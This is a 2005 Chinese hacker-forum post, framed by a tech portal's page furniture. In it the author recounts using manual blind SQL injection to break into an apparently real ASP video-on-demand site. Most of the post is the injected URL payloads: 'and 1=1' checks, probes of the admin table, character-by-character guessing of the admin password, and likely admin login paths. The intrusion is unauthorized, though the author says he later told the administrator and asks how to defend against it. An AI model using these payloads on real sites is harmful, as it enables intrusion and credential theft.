初次使用SQL破解某电影网站的记录

作者: 晓菲出处:黑基　 ( ) 砖 ( ) 好评论 ( ) 条　进入论坛

更新时间：2005-12-17 22:49
关键词：SQL
阅读提示：首先下载：09月21日的SQL注入技术实例讲解，打开后是网页形式的，看过一次以后拿某网站VOD视频做了一下测试。

首先下载：09月21日的SQL注入技术实例讲解，打开后是网页形式的，看过一次以后拿某网站VOD视频做了一下测试。
首先引用一下教程里的话：“SQL injection可以说是一种漏洞，也可以说成是一种攻击方法，程序中的变量处理不当，对用户提交的数据过滤不足，都可能产生这个漏洞，而攻击原理就是利用用户提交或可修改的数据，把想要的SQL语句插入到系统实际SQL语句中，轻则获得敏感的信息，重则控制服务器。SQL injection并不紧紧局限在Mssql数据库中，Access、Mysql、Oracle、Sybase都可以进行SQL injection攻击。在大多数ASP站点中，我们并不知道其程序代码，靠任何扫描器也不可能发现SQL injection漏洞，这时就要靠手工检测了，由于我们执行SQL语句要用到单引号、分号、逗号、冒号和“--”，所以我们就在可修改的URL后加上以上符号，或在表单中的文本框加上这些符号 ”
寻找目标，我寻找到了，这里就用www.xxx.com代替吧。
打开一个电影地址，www.xxx.com/film/show.asp?id=271
测试一下www.xxx.com/film/show.asp?id=271 and 1=1
打开了　　这步应该是测试可不可以用SQL注入攻击的一个验证吧，（不过我试的那个网站是可以SQL注入攻击的，我到不知道不可以SQL注入攻击会返回什么值）
www.xxx.com/film/show.asp?id=271and 1=2没打开（在教程里面这个写成了_blank>http://www.bofei.net/film/show.asp?id=271　adn 1=2 希望管理员如果看到的话请改一下~~）
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin)这一步是查看是否存在ADMIN列表的，测试以后打开，说明ADMIN列表存在
根据教程测试，测试密码，www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where len(username)>5) 打不开，连接错误，后来跟教程一样试了8，结果也是错误，后来直接图方便把8改成了6，嘿嘿，还是错误，为啥？因为是>而不是=，后来试了几次都没有打开。郁闷了，想，是在哪出错的？后来从新看了一次教程，并把命令粘到了文本文档做比较，哦，原来应该是=，
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where len(username)=6)
试了一下=以后，结果打开了，说明ADMIN的密码=6位　继续下一步。
猜测用户名
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(username,1)=''1'')
直接套这步，没打开，后来苦思N久，没看懂教程里面的意思，哎，先放着，继续下一步。
寻找站长的名字，当时还是没大看懂这句，网站上N多地方都没有网站站长的名字之类的，继续下一步。
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(username,6)=''13月32日'')
我试了次，当然打不开，2个站的站点ADMIN怎么能一样内，嘿嘿。当时没有理解这个的意思，我又继续了下一步。我虽然不理解这句的意思，但是我稍微知道，13月32日，就是站长的ID，(username,6)就是站长的名字=6位长的意思。（不知道这样理解对不对呀如果不对请指出）
猜测密码，www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,6)=''100200'')
这步他直接猜测完了，他的密码是6位数，然后密码是100200，这步的步骤。
第1步应该猜测第1位数的密码，
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,1)=''1'')
''1''　应该把这个''''号里的1，从0-9，A-Z试一次，如果失败，会打不开，直到成功了，就会正打开，而且没有错误提示。这句我只能理解括号里面的，(password,1)=''1'')这句理解成：密码的第1位数=1
试完第1个密码该试第2个密码了，
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,2)=''10'')
因为我已经站点第1个密码是1了所以不用动第1位数了，这次也是从0-9，A-Z试一次，这步完了就该第3步了，
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,3)=''100'')
依次第6步就应该是
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,6)=''100200'')
因为先前已经知道他的密码长度是6位了，然后他的管理员ID也依照这个方法来查
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(username,1)=''1'')
(username,1)=''1'') 这句理解成：第1个名字的是：1
依次查出管理员名称，
pass:如果管理员名字改成汉字，那半年也猜不错吧？不知道能不能用汉字？：（
试出管理员密码，然后试登陆页面，3个地址
www.xxx.com/film/adminlogin.asp
www.xxx.com/film/login.asp
www.xxx.com/film/admin/login.asp
大概会应该有一个能进入的，然后用你刚才查到的管理员ID和PASSWORD进入。
好了，可以随意浏览了，我进入了一下，没什么好看的，我自己也有自己的站点，我要想看，自己下一个看算了，而且我和这个网站的管理员关系很好，如果我想看里面的电影，他会传到开设到我帐户的FTP里，然后我自己下载就可以看了，所以我已经把这个漏洞告诉他了，剩下的就是他们的办法了，由于偶还是菜菜，偶不会清楚自己的PP，55，我也很诚实的告诉了他，而且我也没动里面任何客户的资料，没添加任何一个客户的时间卡，我想我这个善意的举动，他们不会对我做什么惩罚吧？（第1次做这个事，不知道能不能算的上hacker的举动，我没用任何工具，全靠手慢慢猜的）如果他们惩罚我我可就完了，这个VOD视频网站的上头，就是我们当地的宽带公司，我们这里只有电信和网通2家，电信是刚起家的接入的地方比较少，网通给我停网了，恐怕以后我就不能在家上网了，555。
这个方法，现在能成功的ASP电影网站恐怕很少了，因为我们这里相对网络技术比较落后一些，他们的网络安全观念比较淡薄，所以这次还是会很顺利的进入了他们的电影网站，我想如果他们进入数据库里，类似做论坛一样，随便改几个数据库中的连接，就可以直接解决这个问题了，起码你没有他服务器的权限，你就不知道他的ADMIN管理进口在哪。
也希望各位高手说一下，就当帮小的一个忙，如果象我说的那种情况，有什么方法可以阻止别人象我这样利用SQL攻击而获得ADMIN帐号？会的请跟贴说一下，谢谢了。（别叫人整个ASP都删掉哟）　　
希望各位高手大大都把自己第1次觉得自己做的成功的事，发上来，对于新手的学习，会起到很大的作用的。

滚动新闻　术语词典　问题悬赏

发表

共条查看

评价

相关

·嵌入式
·爱生活爱网络
·阿刘办公设备维修
·综合布线技术交流
·僖哈组

我也说两句

中国领先的 IT 技术网站 ·
技术成就梦想

·平凡黑客讲述精彩人生（八）有一..
·平凡黑客讲述精彩人生（七）你和..

· “熊猫烧香”病毒制造..
· 中国黑客超强X档案第2..
· 中国黑客超强X档案第2..
· Windows年底再现图片漏..
· MBSA本地审核策略建议
· 年终岁末，注意病毒给..

· 中国黑客超强X档案第2..
· 中国黑客超强X档案第1..
· 中国黑客超强X档案第1..
· 求助：视频在sql2005中..
· SQLSERVER如何调用第三..
· T-sql与sql是同一种语..

排行榜

·ARP攻击防范与解决方案 (查看72126次)
·ARP病毒攻击技术分析与防御 (查看30112次)
·远程控制软件VNC教程和对内网机.. (查看27523次)
·江民“熊猫烧香”专杀工具 (查看27326次)
·ARP病毒解决办法 (查看23025次)

·ARP攻击防范与解决方案 (525个砖)
·51CTO安全专访：信息安全的基石—安全操作系统 (443个砖)
·51CTO调查：七成技术人员不相信“可杀未知病毒” (431个砖)
·病毒查杀专题 (168个砖)
·51CTO专访：优秀杀毒产品应该具备的特征 (163个砖)

·清除流氓软件——51CTO特别专题 (701个好)
·ARP攻击防范与解决方案 (491个好)
·51CTO调查：七成技术人员不相信“可杀未知病毒” (483个好)
·51CTO安全专访：信息安全的基石—安全操作系统 (460个好)
·深入了解PGP加密技术 (181个好)

·CISSP认证成长之路 (09月)
·国内安全厂商新排名出炉谁是你心中的第一 (08月)
·垃圾邮件新对策：远程定制托管服务 (08月)
·冷眼旁观2007年半年安全报告 (07月)
·企业如何选择UTM一体化安全网关 (07月)

·网络应用趣味技术自测：从DNS到Mai..
·一台电脑上安装145个操作系统

· 网络应用趣味技术自测..
· 微软统一沟通视频系列..
· Oracle 11g Linux正式..
· 微软整合Windows Live..
· 鲁毅智：英特尔的非法..
· 中兴声明对菲总统禁令..
· 从交换机原理看网络广..
· 开源软件启用Java的新..

· 7种选择描绘AMD忐忑前途
· 熊猫烧香制造者今日受..
· 微软推新Live Search抗..
· 专家教你写简历系列之..
· Active Directory中的..
· 思科交换机上实现MAC地..
· 微软向OEM厂商提供XP恢..
· ARP攻防实例一：用Sinf..

订阅技术快讯

电子杂志下载

名称：网络安全精品应用黄皮书
简介：《2007精品网络安全黄皮书》包括了9个大类24个小类， 800余篇文章，内容包含了熊猫烧香病毒、DDOS攻击、ARP病等热点问题的介绍及解决方案。从病毒查杀、防范、系统、数据等各方面的安全设置到黑客技术的了解、防范，涉及到了安全应用的全部领域, 由浅至深内容全面。

名称：Vista精品应用黄皮书
简介：《Vista精品应用黄皮书》囊括了Vista的各方面内容。此次的精简版，是将里面的内容做了提取，便于用户下载和使用。内容包含了各种Vista的安装与实施、技巧与解析以及各种Vista相关学习文档和相关软件的安全下载。该电子书是了解和应用Vista人员必备的工具手册，并且也是第一本

名称：2006中国IT论坛精品集合
简介：本书由“51CTO论坛推广联盟”制作完成。书中所有内容均来自各联盟成员的论坛（网站）。制作本书的目的是为了集中大家的优势资源，将更多更精彩的内容带给广大技术爱好者。本书是联盟成立以来制作的第一本书。

专题

最多好

最多砖

DB2 9技术资源中.. 推荐阅读
·DB2 Viper快速入门 ·DB2 9数据库的镜像分割与..	·将XML应用程序从DB2 8.x.. ·DB2 9中的pureXML：如何..
51CTO.com编辑部.. 推荐阅读
·服务器中的“傻瓜机”在.. ·盖茨也喜欢登录Youtube看..	· ·

hellen 的博客
· 职场冲浪（之八）：让感.. ·职场冲浪（之七）：潜心..	·人生如鞋 ·职场冲浪(之六):从离梦最..
白璐的博客
·将职业教育职业化 - 各IT.. ·思科交换机上实现MAC地址..	·关于51CTO合作出书中的职.. ·OSPF动态路由协议入门简介

组网建网	安全频道
· NGN:下一代网络 · 网络访问中断大排查 · FTTx光纤接入	· 平凡黑客讲述精彩人生（.. · 平凡黑客讲述精彩人生（.. · 平凡黑客讲述精彩人生（..
编程频道	前沿技术
· C++是垃圾语言？！ · 2007年IT界七大抄袭事件 · Java实用开发全集	· 解析Ajax开发框架走进A.. · 基于Google Maps与Ajax.. · 基于Google Maps与Ajax..
操作系统	服务器
· Ubuntu 中文开源频道 · Solaris基础知识入门 · 微软正式发布英文版Wind..	· 服务器基础知识入门 · Rambus第二？看全缓冲内.. · 服务器节能对比测试：AM..
数据库	存储频道
· 甲骨文Oracle 11g正式发.. · Oracle数据库开发之PL/S.. · Oracle数据库开发基础教..	· 存储2006，一个并购的大.. · IDC宣布浪潮蝉联存储市.. · 双机热备技术